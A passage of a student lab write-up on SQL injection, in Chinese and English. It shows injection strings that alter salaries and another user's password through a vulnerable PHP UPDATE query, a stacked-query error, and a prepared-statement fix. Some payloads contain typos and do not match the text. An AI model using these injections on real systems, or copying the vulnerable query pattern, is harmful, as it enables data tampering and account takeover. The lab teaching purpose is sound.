'or Name='Admin';UPDATE credential SET Salary = '88888' WHERE Name='Alice';# 在username中
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UPDATE credential SET Salary = '88888'WHEREName='Alice';#' and Password='da39' at line 3]\n
这说明分号前后被分割为两个语句
Task 3: SQL Injection Attack on UPDATE Statement
edit profile的源码:
1 2 3 4 5 6 7 8 9
$hashed_pwd = sha1($input_pwd); $sql = "UPDATE credential SET nickname=’$input_nickname’, email=’$input_email’, address=’$input_address’, Password=’$hashed_pwd’, PhoneNumber=’$input_phonenumber’ WHERE ID=$id;"; $conn->query($sql);
Task 3.1: Modify your own salary.
注入如下:
1
',Salary='99999999'#
Task 3.2: Modify other people’ salary.
1
',salary='1'where name='Boby'#
Task 3.3: Modify other people’ password.
先把nmsl转化为sha1,然后填入password字段方可通过nmsl登录成功
1
',password='nmsl' wherename='Boby'#
Task 4: Countermeasure — Prepared Statement
预防SQL注入的方法:使用预处理机制,实现代码与数据分离
可以把原先代码通过预处理进行改写:
1 2 3 4 5 6 7 8 9
$conn = getDB(); $stmt = $conn->prepare("SELECT name, local, gender FROM USER_TABLE WHERE id = ? and password = ? "); // Bind parameters to the query $stmt->bind_param("is", $id, $pwd); $stmt->execute(); $stmt->bind_result($bind_name, $bind_local, $bind_gender); $stmt->fetch();